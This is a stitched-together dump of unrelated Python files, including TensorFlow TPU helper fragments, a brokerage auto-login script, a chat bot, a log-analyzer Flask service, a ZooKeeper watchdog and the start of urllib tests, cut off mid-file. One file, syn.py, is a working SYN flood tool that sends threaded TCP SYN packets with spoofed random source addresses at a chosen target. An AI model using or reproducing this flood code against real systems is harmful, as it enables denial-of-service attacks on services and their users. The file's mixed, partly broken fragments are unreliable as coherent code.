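# E.g. _example_pad_and_mask([7, 8, 9], 8) gives mask [0 0 0 1 1 1 1 1] and a
# padded array of length 8.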
class _SignalsHelper(object):
"""A general helper class to handle common signals manipulation."""
def __init__(self, signals):
self._signal_keys = []
    for key in sorted(signals):
self._signal_keys.append(key)
@property
def num_signals(self):
return len(self._signal_keys)
def unflatten(self, tensor_list):
return dict(zip(self._signal_keys, tensor_list))
@staticmethod
def as_tensor_list(signals):
    return [signals[key] for key in sorted(signals)]
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()])))
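# --- Illustrative sketch (editor's addition, not part of the original module).
# A hedged, minimal end-to-end usage example of the estimator defined above,
# assuming a contrib-era TF 1.x environment where this module is exposed as
# `tf.contrib.tpu`. The exact module paths, RunConfig fields, and `master`
# address are assumptions that vary between TF versions; treat this as a
# sketch of the documented contract (global batch size in the constructor,
# per-shard `params['batch_size']` in input_fn/model_fn, and a
# TPUEstimatorSpec returned by model_fn), not as a drop-in script.
def _example_tpu_estimator_usage(master='', model_dir='/tmp/tpu_example'):
  """Builds and trains a toy TPUEstimator (sketch; requires TF 1.x contrib)."""
  import tensorflow as tf  # Assumed: TF 1.x with tf.contrib available.
  def train_input_fn(params):
    # `params['batch_size']` is the per-shard/per-host batch size that
    # TPUEstimator derives from `train_batch_size`.
    batch_size = params['batch_size']
    features = tf.random_uniform([batch_size, 10])
    labels = tf.random_uniform([batch_size, 1])
    return tf.data.Dataset.from_tensors((features, labels)).repeat()
  def model_fn(features, labels, mode, params):
    del params  # Only the injected batch size matters for this toy model.
    predictions = tf.layers.dense(features, 1)
    loss = tf.losses.mean_squared_error(labels, predictions)
    # CrossShardOptimizer inserts the CrossReplicaSum op that
    # `_validate_tpu_training_graph` above checks for.
    optimizer = tf.contrib.tpu.CrossShardOptimizer(
        tf.train.GradientDescentOptimizer(0.01))
    train_op = optimizer.minimize(loss, global_step=tf.train.get_global_step())
    return tf.contrib.tpu.TPUEstimatorSpec(mode=mode, loss=loss,
                                           train_op=train_op)
  run_config = tf.contrib.tpu.RunConfig(
      master=master,
      model_dir=model_dir,
      tpu_config=tf.contrib.tpu.TPUConfig(iterations_per_loop=100,
                                          num_shards=8))
  estimator = tf.contrib.tpu.TPUEstimator(
      model_fn=model_fn, config=run_config, use_tpu=True,
      train_batch_size=1024)
  estimator.train(input_fn=train_input_fn, max_steps=1000)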
|
syn.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
from scapy.all import IP, TCP, send
from threading import Thread
# Import modules for SYN flood
import tools.randomData as randomData
def SYN_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting SYN attack...")
threads_list = []
# SYN flood
def syn_flood():
global FINISH
while True:
if FINISH:
break
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target_ip
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target_port
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
try:
send(IP_Packet / TCP_Packet, verbose = False)
except Exception as e:
print(e)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" SYN packet was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = syn_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;33m"+"[!]"+"\033[0m"+" SYN attack completed.")
|
autologin1.py
|
import os
import sys
import time
import pythoncom
from manuallogin import *
from PyQt5 import QtWidgets
from PyQt5.QtCore import QTimer
from multiprocessing import Process
from PyQt5.QAxContainer import QAxWidget
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import OPENAPI_PATH
class Window(QtWidgets.QMainWindow):
app = QtWidgets.QApplication(sys.argv)
def __init__(self):
super().__init__()
self.bool_connected = False
self.ocx = QAxWidget('KHOPENAPI.KHOpenAPICtrl.1')
self.ocx.OnEventConnect.connect(self.OnEventConnect)
self.CommConnect()
def CommConnect(self):
self.ocx.dynamicCall('CommConnect()')
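        # Pump pending COM/Windows messages so the OnEventConnect callback can fire
        # while this loop blocks waiting for the connection.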
while not self.bool_connected:
pythoncom.PumpWaitingMessages()
def OnEventConnect(self, err_code):
if err_code == 0:
self.bool_connected = True
self.AutoLoginOn()
def AutoLoginOn(self):
        print('\n Waiting for auto-login setup ...\n')
        QTimer.singleShot(5000, lambda: auto_on(1))
        self.ocx.dynamicCall('KOA_Functions(QString, QString)', 'ShowAccountWindow', '')
        print(' Auto-login setup complete\n')
        print(' Shutting down the auto-login setup process ...')
if __name__ == '__main__':
login_info = f'{OPENAPI_PATH}/system/Autologin.dat'
if os.path.isfile(login_info):
os.remove(f'{OPENAPI_PATH}/system/Autologin.dat')
        print('\n Deleted the existing auto-login settings file\n')
    Process(target=Window).start()
    print(' Started the auto-login setup process\n')
    while find_window('Open API login') == 0:
        print(' Waiting for the login window to open ...\n')
        time.sleep(1)
    print(' Waiting for ID and password input ...\n')
    time.sleep(5)
    manual_login(2)
    print(' ID and password input complete\n')
|
mth_event.py
|
from machin.parallel.event import *
from machin.parallel.thread import Thread
import time
event1 = Event()
event2 = Event()
event3 = Event()
# wait() blocks until the compound event's value might have changed (because a
# sub-event was set or cleared) and returns the event's current bool value.
def test1():
global event1, event2, event3
event = OrEvent(event1, event2, event3)
while not event.wait():
continue
    # will print if any one of these events is set
print("hello1")
def test2():
global event1, event2, event3
event = AndEvent(AndEvent(event1, event3), event2)
while not event.wait():
continue
# will print if event1, event2 and event3 are all set
print("hello2")
if __name__ == "__main__":
t1 = Thread(target=test1)
t2 = Thread(target=test2)
t1.start()
t2.start()
print("set event1")
event1.set()
time.sleep(1)
print("set event2")
event2.set()
print("set event3")
event3.set()
|
bot.py
|
import logging
import threading
import time
import tinybot
log = logging.getLogger(__name__)
def main():
room_name = tinybot.pinylib.CONFIG.ROOM
if tinybot.pinylib.CONFIG.ACCOUNT and tinybot.pinylib.CONFIG.PASSWORD:
bot = tinybot.TinychatBot(room=room_name, account=tinybot.pinylib.CONFIG.ACCOUNT,
password=tinybot.pinylib.CONFIG.PASSWORD)
else:
bot = tinybot.TinychatBot(room=room_name)
bot.nickname = tinybot.pinylib.CONFIG.BOTNICK
    do_login = True
if do_login:
if not bot.account:
bot.account = raw_input('Account: ').strip()
if not bot.password:
bot.password = raw_input('Password: ')
is_logged_in = bot.login()
while not is_logged_in:
bot.account = raw_input('Account: ').strip()
bot.password = raw_input('Password: ')
if bot.account == '/' or bot.password == '/':
main()
break
elif bot.account == '//' or bot.password == '//':
do_login = False
break
else:
is_logged_in = bot.login()
if is_logged_in:
bot.console_write(tinybot.pinylib.COLOR['bright_green'], 'Logged in as: %s' % bot.account)
if not do_login:
bot.account = None
bot.password = None
threading.Thread(target=bot.connect).start()
while not bot.is_connected:
time.sleep(2)
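    # Simple console loop: lines starting with '/' are handled as commands; anything else is sent to the chat.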
while bot.is_connected:
chat_msg = raw_input()
if chat_msg.startswith('/'):
msg_parts = chat_msg.split(' ')
cmd = msg_parts[0].lower().strip()
if cmd == '/q':
bot.disconnect()
elif cmd == '/a':
if len(bot.users.signed_in) == 0:
print ('No signed in users in the room.')
else:
for user in bot.users.signed_in:
print ('%s:%s' % (user.nick, user.account))
elif cmd == '/u':
for user in bot.users.all:
print ('%s: %s' % (bot.users.all[user].nick, bot.users.all[user].user_level))
elif cmd == '/m':
if len(bot.users.mods) == 0:
print ('No moderators in the room.')
else:
for mod in bot.users.mods:
print (mod.nick)
elif cmd == '/n':
if len(bot.users.norms) == 0:
print ('No normal users in the room.')
else:
for norm in bot.users.norms:
print (norm.nick)
elif cmd == '/l':
if len(bot.users.lurkers) == 0:
print ('No lurkers in the room.')
else:
for lurker in bot.users.lurkers:
print (lurker.nick)
# FOR DEBUGGING METHODS!
elif cmd == '/t':
pass
else:
bot.send_chat_msg(chat_msg)
if __name__ == '__main__':
if tinybot.pinylib.CONFIG.DEBUG_TO_FILE:
        formatter = '%(asctime)s : %(levelname)s : %(filename)s : %(lineno)d : %(funcName)s() : %(name)s : %(message)s'
        logging.basicConfig(filename=tinybot.pinylib.CONFIG.DEBUG_FILE_NAME,
                            level=tinybot.pinylib.CONFIG.DEBUG_LEVEL,
                            format=formatter)
log.info('Starting tinybot: %s, pinylib version: %s' % (tinybot.__version__,
tinybot.pinylib.__version__))
else:
log.addHandler(logging.NullHandler())
main()
|
app.py
|
"""
* Copyright 2019 EPAM Systems
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
import logging
import logging.config
from signal import signal, SIGINT
from sys import exit
import os
import threading
import time
import json
from flask import Flask, Response, jsonify
from flask_cors import CORS
import amqp.amqp_handler as amqp_handler
from amqp.amqp import AmqpClient
from commons.esclient import EsClient
from commons import model_chooser
from utils import utils
from service.cluster_service import ClusterService
from service.auto_analyzer_service import AutoAnalyzerService
from service.analyzer_service import AnalyzerService
from service.suggest_service import SuggestService
from service.suggest_info_service import SuggestInfoService
from service.search_service import SearchService
from service.clean_index_service import CleanIndexService
from service.namespace_finder_service import NamespaceFinderService
from service.delete_index_service import DeleteIndexService
from service.retraining_service import RetrainingService
from service.suggest_patterns_service import SuggestPatternsService
APP_CONFIG = {
"esHost": os.getenv("ES_HOSTS", "http://elasticsearch:9200").strip("/").strip("\\"),
"esUser": os.getenv("ES_USER", "").strip(),
"esPassword": os.getenv("ES_PASSWORD", "").strip(),
"logLevel": os.getenv("LOGGING_LEVEL", "DEBUG").strip(),
"amqpUrl": os.getenv("AMQP_URL", "").strip("/").strip("\\"),
"exchangeName": os.getenv("AMQP_EXCHANGE_NAME", "analyzer"),
"analyzerPriority": int(os.getenv("ANALYZER_PRIORITY", "1")),
"analyzerIndex": json.loads(os.getenv("ANALYZER_INDEX", "true").lower()),
"analyzerLogSearch": json.loads(os.getenv("ANALYZER_LOG_SEARCH", "true").lower()),
"analyzerSuggest": json.loads(os.getenv("ANALYZER_SUGGEST", "true").lower()),
"analyzerCluster": json.loads(os.getenv("ANALYZER_CLUSTER", "true").lower()),
"turnOffSslVerification": json.loads(os.getenv("ES_TURN_OFF_SSL_VERIFICATION", "false").lower()),
"esVerifyCerts": json.loads(os.getenv("ES_VERIFY_CERTS", "false").lower()),
"esUseSsl": json.loads(os.getenv("ES_USE_SSL", "false").lower()),
"esSslShowWarn": json.loads(os.getenv("ES_SSL_SHOW_WARN", "false").lower()),
"esCAcert": os.getenv("ES_CA_CERT", ""),
"esClientCert": os.getenv("ES_CLIENT_CERT", ""),
"esClientKey": os.getenv("ES_CLIENT_KEY", ""),
"minioHost": os.getenv("MINIO_SHORT_HOST", "minio:9000"),
"minioAccessKey": os.getenv("MINIO_ACCESS_KEY", "minio"),
"minioSecretKey": os.getenv("MINIO_SECRET_KEY", "minio123"),
"appVersion": "",
"binaryStoreType": os.getenv("ANALYZER_BINARYSTORE_TYPE", "minio"),
"minioBucketPrefix": os.getenv("ANALYZER_BINARYSTORE_BUCKETPREFIX", "prj-"),
"minioRegion": os.getenv("ANALYZER_BINARYSTORE_MINIO_REGION", None),
"instanceTaskType": os.getenv("INSTANCE_TASK_TYPE", "").strip(),
"filesystemDefaultPath": os.getenv("FILESYSTEM_DEFAULT_PATH", "storage").strip(),
"esChunkNumber": int(os.getenv("ES_CHUNK_NUMBER", "1000")),
"esProjectIndexPrefix": os.getenv("ES_PROJECT_INDEX_PREFIX", "").strip()
}
SEARCH_CONFIG = {
"MinShouldMatch": os.getenv("ES_MIN_SHOULD_MATCH", "80%"),
"BoostAA": float(os.getenv("ES_BOOST_AA", "-8.0")),
"BoostLaunch": float(os.getenv("ES_BOOST_LAUNCH", "4.0")),
"BoostUniqueID": float(os.getenv("ES_BOOST_UNIQUE_ID", "8.0")),
"MaxQueryTerms": int(os.getenv("ES_MAX_QUERY_TERMS", "50")),
"SearchLogsMinSimilarity": float(os.getenv("ES_LOGS_MIN_SHOULD_MATCH", "0.95")),
"ClusterLogsMinSimilarity": float(os.getenv("CLUSTER_LOGS_MIN_SHOULD_MATCH", "0.95")),
"MinWordLength": int(os.getenv("ES_MIN_WORD_LENGTH", "2")),
"TimeWeightDecay": float(os.getenv("ES_TIME_WEIGHT_DECAY", "0.95")),
"PatternLabelMinPercentToSuggest": float(os.getenv("PATTERN_LABEL_MIN_PERCENT", "0.9")),
"PatternLabelMinCountToSuggest": int(os.getenv("PATTERN_LABEL_MIN_COUNT", "5")),
"PatternMinCountToSuggest": int(os.getenv("PATTERN_MIN_COUNT", "10")),
"MaxLogsForDefectTypeModel": int(os.getenv("MAX_LOGS_FOR_DEFECT_TYPE_MODEL", "10000")),
"ProbabilityForCustomModelSuggestions": min(
0.8, float(os.getenv("PROB_CUSTOM_MODEL_SUGGESTIONS", "0.7"))),
"ProbabilityForCustomModelAutoAnalysis": min(
1.0, float(os.getenv("PROB_CUSTOM_MODEL_AUTO_ANALYSIS", "0.5"))),
"BoostModelFolder": "",
"SuggestBoostModelFolder": "",
"SimilarityWeightsFolder": "",
"GlobalDefectTypeModelFolder": "",
"RetrainSuggestBoostModelConfig": "",
"RetrainAutoBoostModelConfig": "",
"MaxSuggestionsNumber": int(os.getenv("MAX_SUGGESTIONS_NUMBER", "3")),
"AutoAnalysisTimeout": int(os.getenv("AUTO_ANALYSIS_TIMEOUT", "300")),
"MaxAutoAnalysisItemsToProcess": int(os.getenv("MAX_AUTO_ANALYSIS_ITEMS_TO_PROCESS", "4000"))
}
def create_application():
"""Creates a Flask application"""
_application = Flask(__name__)
return _application
def create_thread(func, args):
"""Creates a thread with specified function and arguments"""
thread = threading.Thread(target=func, args=args)
thread.start()
return thread
def declare_exchange(channel, config):
"""Declares exchange for rabbitmq"""
logger.info("ExchangeName: %s", config["exchangeName"])
try:
channel.exchange_declare(exchange=config["exchangeName"], exchange_type='direct',
durable=False, auto_delete=True, internal=False,
arguments={
"analyzer": config["exchangeName"],
"analyzer_index": config["analyzerIndex"],
"analyzer_priority": config["analyzerPriority"],
"analyzer_log_search": config["analyzerLogSearch"],
"analyzer_suggest": config["analyzerSuggest"],
"analyzer_cluster": config["analyzerCluster"],
"version": config["appVersion"], })
except Exception as err:
logger.error("Failed to declare exchange")
logger.error(err)
return False
logger.info("Exchange '%s' has been declared", config["exchangeName"])
return True
def init_amqp(_amqp_client):
"""Initialize rabbitmq queues, exchange and stars threads for queue messages processing"""
with _amqp_client.connection.channel() as channel:
try:
declare_exchange(channel, APP_CONFIG)
except Exception as err:
logger.error("Failed to declare amqp objects")
logger.error(err)
return
threads = []
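    # One AmqpClient consumer per queue, each running in its own thread; the lambda
    # callbacks adapt incoming messages to the matching service handler.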
_model_chooser = model_chooser.ModelChooser(APP_CONFIG, SEARCH_CONFIG)
if APP_CONFIG["instanceTaskType"] == "train":
_retraining_service = RetrainingService(_model_chooser, APP_CONFIG, SEARCH_CONFIG)
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "train_models", True, False,
lambda channel, method, props, body:
amqp_handler.handle_inner_amqp_request(channel, method, props, body,
_retraining_service.train_models))))
else:
_es_client = EsClient(APP_CONFIG, SEARCH_CONFIG)
_auto_analyzer_service = AutoAnalyzerService(_model_chooser, APP_CONFIG, SEARCH_CONFIG)
_delete_index_service = DeleteIndexService(_model_chooser, APP_CONFIG, SEARCH_CONFIG)
_clean_index_service = CleanIndexService(APP_CONFIG, SEARCH_CONFIG)
_analyzer_service = AnalyzerService(_model_chooser, APP_CONFIG, SEARCH_CONFIG)
_suggest_service = SuggestService(_model_chooser, APP_CONFIG, SEARCH_CONFIG)
_suggest_info_service = SuggestInfoService(APP_CONFIG, SEARCH_CONFIG)
_search_service = SearchService(APP_CONFIG, SEARCH_CONFIG)
_cluster_service = ClusterService(APP_CONFIG, SEARCH_CONFIG)
_namespace_finder_service = NamespaceFinderService(APP_CONFIG, SEARCH_CONFIG)
_suggest_patterns_service = SuggestPatternsService(APP_CONFIG, SEARCH_CONFIG)
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "index", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_es_client.index_logs,
prepare_response_data=amqp_handler.
prepare_index_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "analyze", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_auto_analyzer_service.analyze_logs,
prepare_response_data=amqp_handler.
prepare_analyze_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "delete", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_delete_index_service.delete_index,
prepare_data_func=amqp_handler.
prepare_delete_index,
prepare_response_data=amqp_handler.
output_result))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "clean", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_clean_index_service.delete_logs,
prepare_data_func=amqp_handler.
prepare_clean_index,
prepare_response_data=amqp_handler.
output_result))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "search", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_search_service.search_logs,
prepare_data_func=amqp_handler.
prepare_search_logs,
prepare_response_data=amqp_handler.
prepare_analyze_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "suggest", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_suggest_service.suggest_items,
prepare_data_func=amqp_handler.
prepare_test_item_info,
prepare_response_data=amqp_handler.
prepare_analyze_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "cluster", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_cluster_service.find_clusters,
prepare_data_func=amqp_handler.
prepare_launch_info,
prepare_response_data=amqp_handler.
prepare_index_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "stats_info", True, False,
lambda channel, method, props, body:
amqp_handler.handle_inner_amqp_request(channel, method, props, body,
_es_client.send_stats_info))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "namespace_finder", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_namespace_finder_service.update_chosen_namespaces,
publish_result=False))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "suggest_patterns", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_suggest_patterns_service.suggest_patterns,
prepare_data_func=amqp_handler.
prepare_delete_index,
prepare_response_data=amqp_handler.
prepare_index_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "index_suggest_info", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_suggest_info_service.index_suggest_info,
prepare_data_func=amqp_handler.
prepare_suggest_info_list,
prepare_response_data=amqp_handler.
prepare_index_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "remove_suggest_info", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_suggest_info_service.remove_suggest_info,
prepare_data_func=amqp_handler.
prepare_delete_index,
prepare_response_data=amqp_handler.
output_result))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "update_suggest_info", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_suggest_info_service.update_suggest_info,
prepare_data_func=lambda x: x))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "remove_models", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_analyzer_service.remove_models,
prepare_data_func=lambda x: x,
prepare_response_data=amqp_handler.
output_result))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "get_model_info", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_analyzer_service.get_model_info,
prepare_data_func=lambda x: x))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "defect_update", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_es_client.defect_update,
prepare_data_func=lambda x: x,
prepare_response_data=amqp_handler.
prepare_search_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "item_remove", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_clean_index_service.delete_test_items,
prepare_data_func=lambda x: x,
prepare_response_data=amqp_handler.
output_result))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "launch_remove", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_clean_index_service.delete_launches,
prepare_data_func=lambda x: x,
prepare_response_data=amqp_handler.
output_result))))
return threads
def read_version():
"""Reads the application build version"""
version_filename = "VERSION"
if os.path.exists(version_filename):
with open(version_filename, "r") as file:
return file.read().strip()
return ""
def read_model_settings():
"""Reads paths to models"""
model_settings = utils.read_json_file("", "model_settings.json", to_json=True)
SEARCH_CONFIG["BoostModelFolder"] = model_settings["BOOST_MODEL_FOLDER"]
SEARCH_CONFIG["SuggestBoostModelFolder"] = model_settings["SUGGEST_BOOST_MODEL_FOLDER"]
SEARCH_CONFIG["SimilarityWeightsFolder"] = model_settings["SIMILARITY_WEIGHTS_FOLDER"]
SEARCH_CONFIG["GlobalDefectTypeModelFolder"] = model_settings["GLOBAL_DEFECT_TYPE_MODEL_FOLDER"]
SEARCH_CONFIG["RetrainSuggestBoostModelConfig"] = model_settings["RETRAIN_SUGGEST_BOOST_MODEL_CONFIG"]
SEARCH_CONFIG["RetrainAutoBoostModelConfig"] = model_settings["RETRAIN_AUTO_BOOST_MODEL_CONFIG"]
log_file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'logging.conf')
logging.config.fileConfig(log_file_path)
if APP_CONFIG["logLevel"].lower() == "debug":
logging.disable(logging.NOTSET)
elif APP_CONFIG["logLevel"].lower() == "info":
logging.disable(logging.DEBUG)
else:
logging.disable(logging.INFO)
logger = logging.getLogger("analyzerApp")
APP_CONFIG["appVersion"] = read_version()
es_client = EsClient(APP_CONFIG, SEARCH_CONFIG)
read_model_settings()
application = create_application()
CORS(application)
threads = []
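# Health endpoint: returns 503 with details when Elasticsearch is unhealthy, otherwise reports a healthy status.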
@application.route('/', methods=['GET'])
def get_health_status():
status = ""
if not es_client.is_healthy(APP_CONFIG["esHost"]):
status += "Elasticsearch is not healthy;"
if status:
logger.error("Analyzer health check status failed: %s", status)
return Response(json.dumps({"status": status}), status=503, mimetype='application/json')
return jsonify({"status": "healthy"})
def handler(signal_received, frame):
print('The analyzer has stopped')
exit(0)
def start_http_server():
application.logger.setLevel(logging.INFO)
logger.info("Started http server")
application.run(host='0.0.0.0', port=5001, use_reloader=False)
signal(SIGINT, handler)
threads = []
logger.info("The analyzer has started")
while True:
try:
logger.info("Starting waiting for AMQP connection")
try:
amqp_client = AmqpClient(APP_CONFIG["amqpUrl"])
except Exception as err:
logger.error("Amqp connection was not established")
logger.error(err)
time.sleep(10)
continue
threads = init_amqp(amqp_client)
logger.info("Analyzer has started")
break
except Exception as err:
logger.error("The analyzer has failed")
logger.error(err)
if __name__ == '__main__':
logger.info("Program started")
start_http_server()
logger.info("The analyzer has finished")
exit(0)
|
watchdog.py
|
# -*- coding: utf-8 -*-
from kazoo.client import KazooClient
import os
import sys
import logging
import time
import signal
from multiprocessing import Process
main_dir = "/root/V3/project/"
signal_dir = '/signal/chinanews'
task_type = "chinanews"
def run_proc():
os.chdir(main_dir +"chinanews/chinanews/spiders")
#arg = ["HELLO","crawl", "spider_" + task_type,"--nolog"]
arg = ["HELLO","crawl", "spider_" + task_type]
os.execvp("scrapy",arg)
def run_wait(a,b):
try:
os.waitpid(-1, os.WNOHANG)
    except Exception:
        print("no child")
signal.signal(signal.SIGCHLD, run_wait)
watchPid = []
for i in range(1,len(sys.argv)):
watchPid.append(int(sys.argv[i]))
hosts_list = ['123.206.89.123:2181', '123.207.157.135:2181', '118.89.234.46:2181']
signal_dic = {"stop":signal.SIGKILL, "start":signal.SIGCONT, "pause":signal.SIGSTOP, "continue":signal.SIGCONT}
zk = KazooClient(hosts = hosts_list)
logging.basicConfig()
zk.start()
print "watch dog working"
stop_flag = False
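# ZooKeeper watch: when a control node appears under signal_dir, forward the mapped
# signal (stop/start/pause/continue) to every watched pid.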
@zk.ChildrenWatch(signal_dir)
def signal_watch(children):
if len(children) != 0:
global watchPid
for pid in watchPid:
os.kill(pid, signal_dic[children[0]])
if children[0] == "stop":
global stop_flag
stop_flag = True
def check(pid):
global stop_flag
if stop_flag == True:
sys.exit(0)
try:
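        # Signal 0 is not delivered; os.kill(pid, 0) only raises if the process no longer exists (or cannot be signalled).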
os.kill(pid, 0)
return pid
    except Exception:  # process no longer exists; restart it
p = Process(target=run_proc)
p.start()
return p.pid
while True:
print "begin check"
global stop_flag
if stop_flag == True:
sys.exit(0)
for pid in watchPid:
newpid = check(pid)
if stop_flag == True:
sys.exit(0)
if newpid != pid:
print "new process"
watchPid.remove(pid)
watchPid.append(newpid)
time.sleep(5)
|
test_urllib.py
|
"""Regresssion tests for urllib"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from test import support
import os
import sys
import tempfile
import warnings
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
opener = urllib.request.FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
